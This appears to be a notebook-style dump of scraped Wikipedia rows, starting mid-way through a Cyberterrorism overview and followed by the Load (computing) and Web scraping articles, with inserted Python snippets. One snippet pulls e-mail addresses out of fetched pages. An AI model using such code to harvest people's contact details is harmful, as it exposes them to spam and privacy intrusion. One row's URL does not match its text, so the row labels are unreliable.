for states to use terrorist proxies in furtherance of objectives. 33 Dependence on the Internet is rapidly increasing on a worldwide scale, creating a platform for international cyber-terror plots to be formulated and executed as a direct threat to national security. 20 For terrorists, cyber-based attacks have distinct advantages over physical attacks. They can be conducted remotely, anonymously, and relatively cheaply, and they do not require significant investment in weapons, explosives or personnel. 34 The effects can be widespread and profound. Incidents of cyberterrorism are likely to increase. They can be expected to take place through denial-of-service attacks, malware, and other methods that are difficult to envision today. 35 One example involves the deaths involving the Islamic State and the online social networks Twitter, Google, and Facebook, which led to legal action being taken against them and ultimately resulted in them being sued. 36 In an article about cyber attacks by Iran and North Korea, The New York Times observes: The appeal of digital weapons is similar to that of nuclear capability: it is a way for an outgunned, outfinanced nation to even the playing field. "These countries are pursuing cyberweapons the same way they are pursuing nuclear weapons," said James A. Lewis, a computer security expert at the Center for Strategic and International Studies in Washington. "It's primitive; it's not top of the line, but it's good enough and they are committed to getting it." 
37 In addition, Cyberterrorism has also been documented to arouse negative emotions. Recent studies have suggested that Cyberterrorism produces heightened levels of anger and stress, which do not differ drastically from the effects of conventional terrorism. 38 Researchers also noted that Cyberterrorism produced higher levels of stress than anger, and the responses are not dependent on the lethality of the attack. 38 Public interest in cyberterrorism began in the late 1990s, when the term was coined by Barry C. Collin. 39 As 2000 approached, the fear and uncertainty about the millennium bug heightened, as did the potential for attacks by cyber terrorists. Although the millennium bug was by no means a terrorist attack or plot against the world or the United States, it did act as a catalyst in sparking the fears of a possibly large-scale devastating cyber-attack. Commentators noted that many of the facts of such incidents seemed to change, often with exaggerated media reports. The high-profile terrorist attacks in the United States on 11 September 2001, and the ensuing War on Terror by the US led to further media coverage of the potential threats of cyberterrorism in the years following. Mainstream media coverage often discusses the possibility of a large attack making use of computer networks to sabotage critical infrastructures with the aim of putting human lives in jeopardy or causing disruption on a national scale either directly or by disruption of the national economy. 40 Authors such as Winn Schwartau and John Arquilla are reported to have had considerable financial success selling books which described what were purported to be plausible scenarios of mayhem caused by cyberterrorism. Many critics claim that these books were unrealistic in their assessments of whether the attacks described (such as nuclear meltdowns and chemical plant explosions) were possible. A common thread throughout what critics perceive as cyberterror-hype is that of non-falsifiability; that is, when the predicted disasters fail to occur, it only goes to show how lucky we've been so far, rather than impugning the theory. In 2016, for the first time ever, the Department of Justice charged Ardit Ferizi with cyberterrorism. He is accused of allegedly hacking into a military website and stealing the names, addresses, and other personal information of government and military personnel and selling it to ISIS. 41 On the other hand, it is also argued that, despite substantial studies on cyberterrorism, the body of literature is still unable to present a realistic estimate of the actual threat. 42 For instance, in the case of a cyberterrorist attack on a public infrastructure such as a power plant or air traffic control through hacking, there is uncertainty as to its success because data concerning such phenomena are limited. 42 Cyberterrorism ranks among the highest potential security threats in the world. It has become more critical than the development of nuclear weapons or the current conflicts between nations. Due to the pervasiveness of the internet and the amount of responsibility assigned to this technology, digital weapons pose a threat to entire economic or social systems. Some of the most critical international security concerns include: DDoS Attacks Millions of Denial of Service attacks occur every year and the service disruption can cost hundreds of thousands of dollars each hour they are down. It is important to keep critical systems secured and redundant to remain online during these attacks. 
Social Engineering In 1997 an experiment conducted by the NSA concluded that thirty-five hackers were able to access critical Pentagon computer systems and could easily edit accounts, reformat data and even shut down entire systems. Often they used phishing tactics such as calling offices and pretending to be technicians to gain passwords. Third Party Software The top retailers are connected with thousands of separate third-party resources and at least 23% of those assets have at least one critical vulnerability. These companies need to manage and reevaluate their network security in order to keep personal data safe. As technology becomes more and more integrated into society, new vulnerabilities and security threats are opened up on these complex networks that we have set up. If an intruder were to gain access to these networks, they would have the potential to threaten entire communities or economic systems. There is no certainty about what events will take place in the future, which is why it is important that there are systems built to adapt to the changing environment. The most apparent cyberterrorism threat in our near future will involve the state of remote work during the COVID-19 pandemic. Companies cannot expect that every home office is up to date and secure, so they must adopt a zero-trust policy for home devices. This means that they must assume corporate resources and unsecured devices are sharing the same space and they must act accordingly. The rise of cryptocurrency has also sparked some additional threats in the realm of security. Cybercriminals are now hijacking home computers and company networks in order to mine certain cryptocurrencies such as bitcoin. This mining process requires an immense amount of computer processing power which can cripple a business’ network and lead to severe downtime if the issue is not resolved. As of 2016 there have been eighteen conventions and major legal instruments that specifically deal with terrorist activities and cyber terrorism. There are many different motives for cyberattacks, with the majority being for financial reasons. However, there is increasing evidence that hackers are becoming more politically motivated. Cyberterrorists are aware that governments are reliant on the internet and have exploited this as a result. For example, Mohammad Bin Ahmad As-Salim's piece "39 Ways to Serve and Participate in Jihad" discusses how an electronic jihad could disrupt the West through targeted hacks of American websites, and other resources seen as anti-Jihad, modernist, or secular in orientation (Denning, 2010; Leyden, 2007). 44 Many cyberattacks are not conducted for money; rather, they are conducted because of different ideological beliefs and a desire for personal revenge or out of outrage towards the company or individual the cybercriminal is attacking. 45 An employee might want to get revenge on a company if they were mistreated or wrongfully terminated. Other motivations for cybercriminals include: Political goals motivate cyber-attackers because they are not happy with candidates and might want certain candidates to win the election; therefore, they might alter election voting to help their preferred candidate win. Competition between two companies can also stir up a cyberattack, as one company can hire a hacker to conduct the attack on a company as they might want to test the rival company's security. 
This will also benefit a company because it will force their competitor's customers to think that the company is not secure due to them getting cyber attacked effortlessly and they don't want any of their personal credentials getting leaked. Cyberwarfare is motivation for countries that are fighting each other. This is mainly used to weaken the opposing country by compromising its core systems and the countries data and other vulnerable information. Money is motivating for cyber attacks for ransomware, phishing, and data theft as the cyber criminals can differently contact the victims and ask for money and in return the data stays safe. 46 The United Nations has several agencies that seek to address in cyberterrorism, including, the United Nations Office of Counter-Terrorism, the United Nations Office on Drugs and Crime, the United Nations Office for Disarmament Affairs, the United Nations Institute for Disarmament Research, the United Nations Interregional Crime and Justice Research Institute, and the International Telecommunication Union. Both EUROPOL and INTERPOL also notably specialize on the subject. Both Europol and Interpol specialize in operations against cyberterrorism as they both collaborate on different operations together and host a yearly joint cybercrime conference. While they both fight against cybercrime, both institutions operate differently. Europol sets up and coordinates cross-border operations against cybercriminals in the EU, while Interpol helps law enforcement and coordinates operations against cyber criminals globally. 47 The Baltic state of Estonia was the target of a massive denial-of-service attack that ultimately rendered the country offline and shut out from services dependent on Internet connectivity in April 2007. The infrastructure of Estonia including everything from online banking and mobile phone networks to government services and access to health care information was disabled for a time. The tech-dependent state experienced severe turmoil and there was a great deal of concern over the nature and intent of the attack. The cyber attack was a result of an Estonian-Russian dispute over the removal of a bronze statue depicting a World War II-era Soviet soldier from the center of the capital, Tallinn. 4 In the midst of the armed conflict with Russia, Georgia likewise was subject to sustained and coordinated attacks on its electronic infrastructure in August 2008. In both of these cases, circumstantial evidence point to coordinated Russian attacks, but attribution of the attacks is difficult; though both the countries blame Moscow for contributing to the cyber attacks, proof establishing legal culpability is lacking. Estonia joined NATO in 2004, which prompted NATO to carefully monitor its member states' response to the attack. NATO also feared escalation and the possibility of cascading effects beyond Estonia's border to other NATO members. In 2008, directly as a result of the attacks, NATO opened a new center of excellence on cyberdefense to conduct research and training on cyber warfare in Tallinn. 48 The chaos resulting from the attacks in Estonia illustrated to the world the dependence countries had on information technology. This dependence then makes countries vulnerable to future cyber attacks and terrorism. 4 Quick information on the cyber attack on Estonia and its effects on the country. 
49 As cyberattacks continue to increase around the world, countries still look at the attacks on Estonia in the 2007 as an example of how countries can fight future cyberattacks and terrorism. As a result of the attacks, Estonia is now currently one of the top countries in cyber defence and online safety and its capital city of Tallinn is home to NATO's cyber defense hub. The government of Estonia continues to update there cyber defence protocols and national cybersecurity strategies. NATO's Cooperative Cyber Defence Centre in Tallinn also conducts research and training on cyber security to not just help Estonia but other countries that are in the alliance. 50 The Chinese Defense Ministry confirmed the existence of an online defense unit in May 2011. Composed of about thirty elite internet specialists, the so-called "Cyber Blue Team", or "Blue Army", is officially claimed to be engaged in cyber-defense operations, though there are fears the unit has been used to penetrate secure online systems of foreign governments. 51 52 China's leaders have invested in its foundations of cyber defense and quantum computing and artificial intelligence. 39 Chinese soldiers were chosen to strengthen China's cyber defenses. The reason given by Spokesman for the Ministry of National Defense, Geng Yansheng was that their internet protection was currently weak. Geng claimed that the program was only temporary to help improve cyber defenses. 53 To counter the cyber terrorists, also called "white-collar jihadis", the police in India has registered private citizens as volunteers who patrol the internet and report the suspected cyber terrorists to the government. These volunteers are categorised in three categories, namely "Unlawful Content Flaggers", "Cyber Awareness Promoters" and "Cyber Experts". In August 2021, police arrested five suspected white-collar jihadis who were preparing a hit list of officers, journalists, social activists, lawyers and political functionaries to create fear among people. The white-collar jihadis are considered "worst kind of terrorists" as they remain anonymous and safe in other nations, but inflict "immeasurable" amount of damage and brainwashing. 54 In India, the demand for cyber security professionals has increased over 100 per cent in 2021 and will rise 200 per cent by 2024. 55 Eighty two percent of companies in India had a ransomware attack in the year 2020. The cost it takes to recover from a ransomware attack in India has gone from $1.1 million in 2020 to $3.38 million in 2021. 56 India is at the top of the list of 30 countries for ransomware attacks. A cyber-attack took place on the electricity grid in Maharashtra that resulted in a power outage. This occurred in October 2020 and the authorities believe China was behind it. 57 Important information like dates of birth and full names were leaked for thousands of patients who were tested for COVID 19. This information was made accessible on Google and was leaked from government websites. The job portal IIMjobs was attacked and the information of 1.4 million people looking for jobs was leaked. The information leaked was quite extensive including the location of users and their names and phone numbers. The information for 500,000 Indian police personal was sold on a forum in February 2021. The information contained much personal information. The data was from a police exam taken in December 2019. 
58 According to 2016 Deloitte Asia-Pacific Defense Outlook, 59 South Korea's 'Cyber Risk Score' was 884 out of 1,000 and South Korea is found to be the most vulnerable country to cyber attacks in the Asia-Pacific region. Considering South Korea's high speed internet and cutting-edge technology, its cyber security infrastructure is relatively weak. 60 The 2013 South Korea cyberattack significantly damaged the Korean economy. This attack wounded the systems of two banks and the computer networks of three TV broadcasters. The incident was a massive blow, and the attacker was never identified. It was theorized to be North Korea. The week before North Korea accused the United States and South Korea of shutting down their internet for two days. 61 In 2017, a ransomware attack harassed private companies and users, who experienced personal information leakage. Additionally, there were North Korea's cyber attacks which risked national security of South Korea. 62 In response to this, South Korean government's countermeasure is to protect the information security centres the National Intelligence Agency. Currently, 'cyber security' is one of the major goals of NIS Korea. 63 Since 2013, South Korea had established policies related to National cyber security and trying to prevent cyber crises via sophisticated investigation on potential threats. Meanwhile, scholars emphasize on improving the national consciousness towards cyber attacks as South Korea had already entered the so-called 'hyper connected society'. North Korea's cyberwarfare is incredibly efficient and the best of state-sponsored hackers. Those who are chosen to be hackers are selected when they are young and trained specifically in cyberwarfare. Hackers are trained to steal money from ATMs but not enough to be reported. North Korea is great at zero-day exploits. The country will hack anyone they chose to. They steal secrets from companies and government agencies and steal money from financial systems to fund their hacking operations. 64 Pakistani Government has also taken steps to curb the menace of cyberterrorism and extremist propaganda. National Counter Terrorism Authority (Nacta) is working on joint programs with different NGOs and other cyber security organizations in Pakistan to combat this problem. Surf Safe Pakistan 65 is one such example. Now people in Pakistan can report extremist and terrorist related content online on Surf Safe Pakistan portal. The National Counter Terrorism Authority (NACTA) provides the Federal Government's leadership for the Surf Safe Campaign. A series of powerful cyber attacks began 27 June 2017, that swamped websites of Ukrainian organizations, including banks, ministries, newspapers and electricity firms. The US Department of Defense (DoD) charged the United States Strategic Command with the duty of combating cyberterrorism. This is accomplished through the Joint Task Force-Global Network Operations, which is the operational component supporting USSTRATCOM in defense of the DoD's Global Information Grid. This is done by integrating GNO capabilities into the operations of all DoD computers, networks, and systems used by DoD combatant commands, services and agencies. On 2 November 2006, the Secretary of the Air Force announced the creation of the Air Force's newest MAJCOM, the Air Force Cyber Command, which would be tasked to monitor and defend American interest in cyberspace. 
The plan was however replaced by the creation of Twenty-Fourth Air Force which became active in August 2009 and would be a component of the planned United States Cyber Command. 66 On 22 December 2009, the White House named its head of computer security as Howard Schmidt to coordinate U.S Government, military and intelligence efforts to repel hackers. He left the position in May 2012. 67 Michael Daniel was appointed to the position of White House Coordinator of Cyber Security the same week 68 and continues in the position during the second term of the Obama administration. 69 Obama signed an executive order to enable the US to impose sanctions on either individuals or entities that are suspected to be participating in cyber related acts. These acts were assessed to be possible threats to US national security, financial issues or foreign policy issues. 70 U.S. authorities indicted a man over 92 cyberterrorism hacks attacks on computers used by the Department of Defense. 71 A Nebraska-based consortium apprehended four million hacking attempts in the course of eight weeks. 72 In 2011 cyberterrorism attacks grew 20%. 73 In May 2021, President Joe Biden announced an executive order aiming to improve America's cybersecurity. It came about after an increase in cybersecurity attacks aimed at the country's public and private sector. The plan aims to improve the government's cyberdefense by working on its ability to identify, deter, protect against, detect, and respond to attacks. The plan has 10 sections written into the document that include, to name a few, improving sharing of threat information, modernizing the government's cybersecurity, and establishing a Cybersecurity Review Board. 74 An operation can be done by anyone anywhere in the world, for it can be performed thousands of miles away from a target. An attack can cause serious damage to a critical infrastructure which may result in casualties. 75 Some attacks are conducted in furtherance of political and social objectives, as the following examples illustrate: Non-political acts of sabotage have caused financial and other damage. In 2000, disgruntled employee Vitek Boden caused the release of 800,000 litres of untreated sewage into waterways in Maroochy Shire, Australia. 105 106 More recently, in May 2007 Estonia was subjected to a mass cyber-attack in the wake of the removal of a Russian World War II war memorial from downtown Tallinn. The attack was a distributed denial-of-service attack in which selected sites were bombarded with traffic to force them offline; nearly all Estonian government ministry networks as well as two major Estonian bank networks were knocked offline; in addition, the political party website of Estonia's Prime Minister Andrus Ansip featured a counterfeit letter of apology from Ansip for removing the memorial statue. citation needed In January 2008 a man from Estonia was convicted for launching the attacks against the Estonian Reform Party website and fined. 107 108 During the Russo-Georgian War, on 5 August 2008, three days before Georgia launched its invasion of South Ossetia, the websites for OSInform News Agency and OSRadio were hacked. The OSinform website at osinform.ru kept its header and logo, but its content was replaced by a feed to the Alania TV website content. Alania TV, a Georgian government-supported television station aimed at audiences in South Ossetia, denied any involvement in the hacking of the websites. 
Dmitry Medoyev, at the time the South Ossetian envoy to Moscow, claimed that Georgia was attempting to cover up information on events which occurred in the lead-up to the war. 109 One such cyber attack caused the Parliament of Georgia and Georgian Ministry of Foreign Affairs websites to be replaced by images comparing Georgian president Mikheil Saakashvili to Adolf Hitler. 110 Other attacks involved denials of service to numerous Georgian and Azerbaijani websites, 111 such as when Russian hackers allegedly disabled the servers of the Azerbaijani Day.Az news agency. 112 In June 2019, Russia conceded that it is "possible" its electrical grid is under cyber-attack by the United States. 113 The New York Times reported that American hackers from the United States Cyber Command planted malware potentially capable of disrupting the Russian electrical grid. 114 Earlier, in October 2007, the website of Ukrainian president Viktor Yushchenko was attacked by hackers. A radical Russian nationalist youth group, the Eurasian Youth Movement, claimed responsibility. 115 116 In 1999, hackers attacked NATO computers, flooding them with email and hitting them with a denial-of-service attack. The hackers were protesting against the NATO bombing of the Chinese embassy in Belgrade. Businesses, public organizations and academic institutions were bombarded with highly politicized emails containing viruses from other European countries. 117 In December 2018, Twitter warned of "unusual activity" from China and Saudi Arabia. A bug was detected in November that could have revealed the country code of users' phone numbers. Twitter said the bug could have had ties to "state-sponsored actors". 118 119 In May 2021, successive waves of DDoS attacks aimed at Belnet, Belgium's public-sector ISP, took down multiple government sites in Belgium. Some 200 sites were affected, leaving public offices, universities, and research centers fully or partially unable to access the internet. 120 |
44 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Load_(computing) | In UNIX computing, the system load is a measure of the amount of computational work that a computer system performs. The load average represents the average system load over a period of time. It conventionally appears in the form of three numbers which represent the system load during the last one-, five-, and fifteen-minute periods. All Unix and Unix-like systems generate a dimensionless metric of three "load average" numbers in the kernel. Users can easily query the current result from a Unix shell by running the uptime command. The w and top commands show the same three load average numbers, as do a range of graphical user interface utilities. In operating systems based on the Linux kernel, this information can be easily accessed by reading the /proc/loadavg file. To explore this kind of information in depth, according to Linux's Filesystem Hierarchy Standard, architecture-dependent information is exposed in the file /proc/stat. 1 2 3 An idle computer has a load number of 0 (the idle process is not counted). Each process using or waiting for CPU (the ready queue or run queue) increments the load number by 1. Each process that terminates decrements it by 1. Most UNIX systems count only processes in the running (on CPU) or runnable (waiting for CPU) states. However, Linux also includes processes in uninterruptible sleep states (usually waiting for disk activity), which can lead to markedly different results if many processes remain blocked in I/O due to a busy or stalled I/O system. 4 This, for example, includes processes blocking due to an NFS server failure or too slow media (e.g., USB 1.x storage devices). Such circumstances can result in an elevated load average, which does not reflect an actual increase in CPU use (but still gives an idea of how long users have to wait). Systems calculate the load average as the exponentially damped weighted moving average of the load number. The three values of load average refer to the past one, five, and fifteen minutes of system operation. 5 Mathematically speaking, all three values always average all the system load since the system started up. They all decay exponentially, but they decay at different speeds: they decay by a factor of e after 1, 5, and 15 minutes respectively. Hence, the 1-minute load average consists of 63% (more precisely: 1 - 1/e) of the load from the last minute and 37% (1/e) of the average load since start-up, excluding the last minute. For the 5- and 15-minute load averages, the same 63%/37% ratio is computed over 5 minutes and 15 minutes, respectively. Therefore, it is not technically accurate that the 1-minute load average only includes the last 60 seconds of activity, as it includes 37% of the activity from the past, but it is correct to state that it includes mostly the last minute. For single-CPU systems that are CPU bound, one can think of load average as a measure of system utilization during the respective time period. For systems with multiple CPUs, one must divide the load by the number of processors in order to get a comparable measure. For example, one can interpret a load average of "1.73 0.60 7.98" on a single-CPU system as follows: this system (CPU, disk, memory, etc.) could have handled all the work scheduled for the last minute if it were 1.73 times as fast. 
In a system with four CPUs, a load average of 3.73 would indicate that there were, on average, 3.73 processes ready to run, and each one could be scheduled into a CPU. On modern UNIX systems, the treatment of threading with respect to load averages varies. Some systems treat threads as processes for the purposes of load average calculation: each thread waiting to run will add 1 to the load. However, other systems, especially systems implementing so-called M:N threading, use different strategies such as counting the process exactly once for the purpose of load (regardless of the number of threads), or counting only threads currently exposed by the user-thread scheduler to the kernel, which may depend on the level of concurrency set on the process. Linux appears to count each thread separately as adding 1 to the load. 6 The comparative study of different load indices carried out by Ferrari et al. 7 reported that CPU load information based upon the CPU queue length does much better in load balancing compared to CPU utilization. The reason CPU queue length did better is probably because when a host is heavily loaded, its CPU utilization is likely to be close to 100%, and it is unable to reflect the exact load level of the utilization. In contrast, CPU queue lengths can directly reflect the amount of load on a CPU. As an example, two systems, one with 3 and the other with 6 processes in the queue, are both very likely to have utilizations close to 100%, although they obviously differ. On Linux systems, the load average is not calculated on each clock tick, but driven by a variable value that is based on the HZ frequency setting and tested on each clock tick. This setting defines the kernel clock tick rate in Hertz (times per second), and it defaults to 100 for 10 ms ticks. Kernel activities use this number of ticks to time themselves. Specifically, the timer.c::calc_load() function, which calculates the load average, runs every LOAD_FREQ (= 5*HZ+1) ticks, or about every five seconds. The avenrun array contains the 1-minute, 5-minute and 15-minute averages. The CALC_LOAD macro and its associated values are defined in sched.h. The "sampled" calculation of load averages is a somewhat common behavior; FreeBSD, too, only refreshes the value every five seconds. The interval is usually taken to not be exact so that they do not collect processes that are scheduled to fire at a certain moment. 8 A post on the Linux mailing list considers its +1 tick insufficient to avoid Moiré artifacts from such collection, and suggests an interval of 4.61 seconds instead. 9 This change is common among Android system kernels, although the exact expression used assumes an HZ of 100. 10 Other commands for assessing system performance include: |
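The behaviour described in this row can be illustrated with a short Python sketch, assuming a Linux host (since /proc/loadavg is Linux-specific). The damped_average() helper only mirrors the idea behind the kernel's CALC_LOAD update, not its exact fixed-point arithmetic, and the function names are mine, not part of any kernel or library API.

import os
import math

def read_load_average(path="/proc/loadavg"):
    # /proc/loadavg holds "1min 5min 15min runnable/total last_pid" on Linux
    with open(path) as f:
        one, five, fifteen = (float(x) for x in f.read().split()[:3])
    return one, five, fifteen

def per_cpu_load(load):
    # Divide by the number of CPUs to compare machines of different sizes
    return load / (os.cpu_count() or 1)

def damped_average(previous, runnable, window_minutes, interval_seconds=5.0):
    # Exponentially damped moving average, the same idea as the kernel's
    # CALC_LOAD macro: new = old*exp + n*(1 - exp), sampled roughly every 5 s
    exp_factor = math.exp(-interval_seconds / (window_minutes * 60.0))
    return previous * exp_factor + runnable * (1.0 - exp_factor)

if __name__ == "__main__":
    one, five, fifteen = read_load_average()
    print("1/5/15 min load:", one, five, fifteen)
    print("1 min load per CPU:", round(per_cpu_load(one), 2))
    # Toy illustration: feed a constant 2 runnable tasks into the 1-minute average
    avg = 0.0
    for _ in range(12):  # 12 samples of 5 s = one minute
        avg = damped_average(avg, 2, window_minutes=1)
    print("After one minute of 2 runnable tasks:", round(avg, 2))  # about 63% of 2

On a four-CPU machine, a 1-minute load of 3.7 would come out as roughly 0.93 per CPU, matching the multi-processor interpretation given above.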
45 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#History | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
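The fetching, regular-expression matching and DOM parsing techniques just described map directly onto the requests, re and BeautifulSoup libraries already imported at the top of this notebook. Below is a minimal, hedged sketch: the URL is a placeholder and the e-mail pattern is deliberately simple rather than RFC-complete.

import re
import requests
from bs4 import BeautifulSoup

def fetch_and_extract(url):
    # HTTP programming: fetch the page much as a browser would
    response = requests.get(url, timeout=10)
    response.raise_for_status()

    # DOM parsing: walk the parsed tree instead of the raw markup
    soup = BeautifulSoup(response.text, "html.parser")
    title = soup.title.string.strip() if soup.title and soup.title.string else ""
    links = [a.get("href") for a in soup.find_all("a", href=True)]

    # Regular-expression matching: grep-style extraction from the visible text
    text = soup.get_text(" ", strip=True)
    emails = re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", text)

    return {"title": title, "links": links, "emails": emails}

if __name__ == "__main__":
    result = fetch_and_extract("https://example.com")  # placeholder URL
    print(result["title"], len(result["links"]), "links,", len(result["emails"]), "emails")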
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc., in the United States District Court for the Eastern District of Virginia, the court ruled that the terms of use should be brought to the users' attention in order for a browse-wrap contract or license to be enforced. 
